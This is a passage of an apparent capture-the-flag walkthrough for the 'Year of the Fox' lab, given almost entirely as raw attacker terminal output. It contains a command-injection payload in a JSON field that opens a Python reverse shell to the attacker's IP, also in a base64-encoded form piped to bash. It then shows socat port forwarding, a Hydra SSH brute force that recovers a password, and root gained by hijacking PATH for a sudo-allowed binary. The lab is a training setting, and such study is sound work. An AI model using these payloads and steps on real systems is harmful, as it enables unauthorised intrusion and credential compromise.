19:27:55.847930 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [.], ack 188, win 501, options [nop,nop,TS val 3382070019 ecr 743972700], length 0 19:27:55.847989 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [F.], seq 188, ack 452, win 972, options [nop,nop,TS val 743972701 ecr 3382066624], length 0 19:27:55.849030 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [F.], seq 452, ack 189, win 501, options [nop,nop,TS val 3382070020 ecr 743972701], length 0 19:27:56.043773 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [.], ack 453, win 972, options [nop,nop,TS val 743972898 ecr 3382070020], length 0 revshell {"target":"\";python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")';\"" } ┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector] └─$ rlwrap nc -lvnp 1338 listening on [any] 1338 ... let's encode it {"target":"\";echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuOC4xOS4xMDMiLDEzMzgpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCIvYmluL2Jhc2giKSc= | base64 -d | bash;\"" } ┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector] └─$ rlwrap nc -lvnp 1338 listening on [any] 1338 ... connect to [10.8.19.103] from (UNKNOWN) [10.10.249.21] 47020 www-data@year-of-the-fox:/var/www/html/assets/php$ which python which python /usr/bin/python www-data@year-of-the-fox:/var/www/html/assets/php$ python -c 'import pty;pty.spawn("/bin/bash")' </php$ python -c 'import pty;pty.spawn("/bin/bash")' www-data@year-of-the-fox:/var/www/html/assets/php$ ls ls search.php www-data@year-of-the-fox:/var/www/html/assets/php$ cd .. cd .. www-data@year-of-the-fox:/var/www/html/assets$ ls ls css fonts images js php www-data@year-of-the-fox:/var/www/html/assets$ cd .. cd .. www-data@year-of-the-fox:/var/www/html$ ls ls assets index.html www-data@year-of-the-fox:/var/www/html$ grep -Ri thm{ grep -Ri thm{ www-data@year-of-the-fox:/var/www/html$ cd .. cd .. www-data@year-of-the-fox:/var/www$ grep -Ri thm{ grep -Ri thm{ web-flag.txt:THM{Nzg2ZWQwYWUwN2UwOTU3NDY5ZjVmYTYw} www-data@year-of-the-fox:/var/www$ netstat -tulpn netstat -tulpn (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN - tcp6 0 0 :::445 :::* LISTEN - tcp6 0 0 :::139 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN - udp 0 0 127.0.0.53:53 0.0.0.0:* - udp 0 0 10.10.249.21:68 0.0.0.0:* - udp 0 0 10.10.255.255:137 0.0.0.0:* - udp 0 0 10.10.249.21:137 0.0.0.0:* - udp 0 0 0.0.0.0:137 0.0.0.0:* - udp 0 0 10.10.255.255:138 0.0.0.0:* - udp 0 0 10.10.249.21:138 0.0.0.0:* - udp 0 0 0.0.0.0:138 0.0.0.0:* - www-data@year-of-the-fox:/var/www$ netstat -tulw | grep ssh netstat -tulw | grep ssh tcp 0 0 localhost:ssh 0.0.0.0:* LISTEN port forwarding ┌──(witty㉿kali)-[~/Downloads] └─$ cp /usr/bin/chisel chisel ┌──(witty㉿kali)-[~/Downloads] └─$ python3 -m http.server 1234 Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ... 10.10.249.21 - - [25/Mar/2023 19:47:49] "GET /chisel HTTP/1.1" 200 - www-data@year-of-the-fox:/var/www$ cd /tmp cd /tmp www-data@year-of-the-fox:/tmp$ ls ls ┌──(witty㉿kali)-[~/Downloads] └─$ locate socat /usr/bin/socat ┌──(witty㉿kali)-[~/Downloads] └─$ python3 -m http.server 1234 Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ... 10.10.249.21 - - [25/Mar/2023 20:32:39] "GET /socat HTTP/1.1" 200 - www-data@year-of-the-fox:/tmp$ wget http://10.8.19.103:1234/socat wget http://10.8.19.103:1234/socat --2023-03-26 00:32:40-- http://10.8.19.103:1234/socat Connecting to 10.8.19.103:1234... connected. HTTP request sent, awaiting response... 200 OK Length: 411624 (402K) [application/octet-stream] Saving to: 'socat' www-data@year-of-the-fox:/tmp$ chmod +x socat chmod +x socat www-data@year-of-the-fox:/tmp$ ./socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22 <cat tcp-listen:8888,reuseaddr,fork tcp:localhost:22 ./socat: error while loading shared libraries: libssl.so.3: cannot open shared object file: No such file or directory https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat download it , I was trying with chisel and shuttle but couldn't do it www-data@year-of-the-fox:/tmp$ rm socat rm socat www-data@year-of-the-fox:/tmp$ wget http://10.8.19.103:1234/socat wget http://10.8.19.103:1234/socat --2023-03-26 00:50:31-- http://10.8.19.103:1234/socat Connecting to 10.8.19.103:1234... connected. HTTP request sent, awaiting response... 200 OK Length: 375176 (366K) [application/octet-stream] Saving to: 'socat' www-data@year-of-the-fox:/tmp$ chmod +x socat chmod +x socat www-data@year-of-the-fox:/tmp$ ./socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22 <cat tcp-listen:8888,reuseaddr,fork tcp:localhost:22 ┌──(witty㉿kali)-[~/Downloads] └─$ rustscan -a 10.10.249.21 --ulimit 5500 -b 65535 -- -A -Pn .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : https://discord.gg/GFrQsGy : : https://github.com/RustScan/RustScan : -------------------------------------- Real hackers hack time ⌛ [~] The config file is expected to be at "/home/witty/.rustscan.toml" [~] Automatically increasing ulimit value to 5500. [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers Open 10.10.249.21:80 Open 10.10.249.21:139 Open 10.10.249.21:445 Open 10.10.249.21:8888 now is open port 22 ┌──(witty㉿kali)-[~/Downloads] └─$ hydra -l fox -P /usr/share/wordlists/rockyou.txt ssh://10.10.249.21:8888 -t 64 Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-25 20:54:20 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task [DATA] attacking ssh://10.10.249.21:8888/ [8888][ssh] host: 10.10.249.21 login: fox password: ricardo 1 of 1 target successfully completed, 1 valid password found [WARNING] Writing restore file because 21 final worker threads did not complete until end. [ERROR] 21 targets did not resolve or could not be connected [ERROR] 0 target did not complete Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-25 20:54:43 ┌──(witty㉿kali)-[~/Downloads] └─$ ssh -p 8888 fox@10.10.249.21 The authenticity of host '[10.10.249.21]:8888 ([10.10.249.21]:8888)' can't be established. ED25519 key fingerprint is SHA256:ytuC6e5+2EWnZLeockeugHFQMCmIRWlKFJR/MF8JPJo. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[10.10.249.21]:8888' (ED25519) to the list of known hosts. fox@10.10.249.21's password: __ __ __ _ _ _____ \ \ / /__ __ _ _ __ ___ / _| | |_| |__ ___ | ___|____ __ \ V / _ \/ _` | '__| / _ \| |_ | __| '_ \ / _ \ | |_ / _ \ \/ / | | __/ (_| | | | (_) | _| | |_| | | | __/ | _| (_) > < |_|\___|\__,_|_| \___/|_| \__|_| |_|\___| |_| \___/_/\_\ fox@year-of-the-fox:~$ ls samba user-flag.txt fox@year-of-the-fox:~$ cat user-flag.txt THM{Njg3NWZhNDBjMmNlMzNkMGZmMDBhYjhk} fox@year-of-the-fox:~$ cd samba/ fox@year-of-the-fox:~/samba$ ls cipher.txt creds1.txt fox@year-of-the-fox:~/samba$ cat cipher.txt JV5FKMSNPJGTITTKKF5E46SZGJGXUVJSJZKFS6CONJCXUTTKJV4U26SBPJHUITJUJV5EC6SNPJMX STL2MN5E6RCNGJGXUWJSJZCE2NKONJGTETLKLEZE26SBGIFE4VCZPBBWUTJUJZVEK6SNPJGXOTL2 IV5E6VCNGRHGURL2JVVFSMSNPJTTETTKJUYE26SRPJGWUTJSJZVE2MSNNJMTCTL2KUZE2VCNGBGX USL2JZVE2M2ONJEXUCSNNJGTGTL2JEZE4ULPPJHVITLXJZVEK6SPIREXOTLKIF4VURCCNBBWOPJ5 BI====== fox@year-of-the-fox:~/samba$ cat creds1.txt JV5GO6SNKRGTKTL2M4ZE2VCNPBGXUWL2JZKE26SNPJGXUT2UJV4E26SVPJGXUWJSJV5FC6SNPJMT ETL2LF5E42SZPJGXURJSJV5E2MCONJKXUTSEJU2U42SZGIFE26SZPBBWUTJSJV5E2MSNKRGXOTL2 KUZE2VCZPJGXUQL2J5CE26KONJITETSELF5E42SRGJGWUTL2JV5FC6SNIRGXQTL2IF5E22SNO5GX UY32J5KE26KNPJRXUCSPKRMXQTTKKEZE2Z3PPJGUIWJSJV5FC6SNPJEXOTLKIF4VURCCNBBWOPJ5 BI====== fox@year-of-the-fox:~/samba$ sudo -l Matching Defaults entries for fox on year-of-the-fox: env_reset, mail_badpass User fox may run the following commands on year-of-the-fox: (root) NOPASSWD: /usr/sbin/shutdown fox@year-of-the-fox:/usr/bin$ cd /usr/sbin fox@year-of-the-fox:/usr/sbin$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.8.19.103 - - [26/Mar/2023 02:05:35] "GET /shutdown HTTP/1.1" 200 - ┌──(witty㉿kali)-[~/Downloads] └─$ wget http://10.10.249.21:8000/shutdown --2023-03-25 21:05:34-- http://10.10.249.21:8000/shutdown Connecting to 10.10.249.21:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 8304 (8.1K) [application/octet-stream] Saving to: ‘shutdown’ shutdown 100%[=========================>] 8.11K --.-KB/s in 0s 2023-03-25 21:05:34 (115 MB/s) - ‘shutdown’ saved [8304/8304] ┌──(witty㉿kali)-[~/Downloads] └─$ file shutdown shutdown: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=c855d329bb81903275997549d0856f9fcb1d40fd, not stripped ┌──(witty㉿kali)-[~/Downloads] └─$ strings shutdown /lib64/ld-linux-x86-64.so.2 libc.so.6 system __cxa_finalize __libc_start_main GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable AWAVI AUATL []A\A]A^A_ poweroff ;*3$" GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0 crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.7698 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry shutdown.c __FRAME_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable _edata system@@GLIBC_2.2.5 __libc_start_main@@GLIBC_2.2.5 __data_start __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main __TMC_END__ _ITM_registerTMCloneTable __cxa_finalize@@GLIBC_2.2.5 .symtab .strtab .shstrtab .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .data .bss .comment the binary executes `poweroff` without an absolute path fox@year-of-the-fox:/usr/sbin$ cd /tmp fox@year-of-the-fox:/tmp$ cp /bin/bash /tmp/poweroff fox@year-of-the-fox:/tmp$ sudo "PATH=/tmp:$PATH" /usr/sbin/shutdown root@year-of-the-fox:/tmp# cd /root root@year-of-the-fox:/root# ls -lah total 36K drwx------ 5 root root 4.0K Mar 25 22:17 . drwxr-xr-x 22 root root 4.0K May 29 2020 .. lrwxrwxrwx 1 root root 9 May 28 2020 .bash_history -> /dev/null -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc drwx------ 2 root root 4.0K May 30 2020 .cache drwx------ 3 root root 4.0K May 30 2020 .gnupg drwxr-xr-x 3 root root 4.0K May 28 2020 .local -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 21 May 31 2020 root.txt -rw-r--r-- 1 root root 75 May 31 2020 .selected_editor root@year-of-the-fox:/root# cat root.txt Not here -- go find! root@year-of-the-fox:/root# find /home -group root -type f /home/rascal/.did-you-think-I-was-useless.root /home/fox/user-flag.txt /home/fox/samba/cipher.txt root@year-of-the-fox:/root# cat /home/rascal/.did-you-think-I-was-useless.root THM{ODM3NTdkMDljYmM4ZjdhZWFhY2VjY2Fk} Here's the prize: YTAyNzQ3ODZlMmE2MjcwNzg2NjZkNjQ2Nzc5NzA0NjY2Njc2NjY4M2I2OTMyMzIzNTNhNjk2ODMwMwo= Good luck! https://cyberchef.io/#recipe=Reverse('Character')From_Hex('Auto')ROT13(true,true,false,21)&input=YTAyNzQ3ODZlMmE2MjcwNzg2NjZkNjQ2Nzc5NzA0NjY2Njc2NjY4M2I2OTMyMzIzNTNhNjk2ODMwMw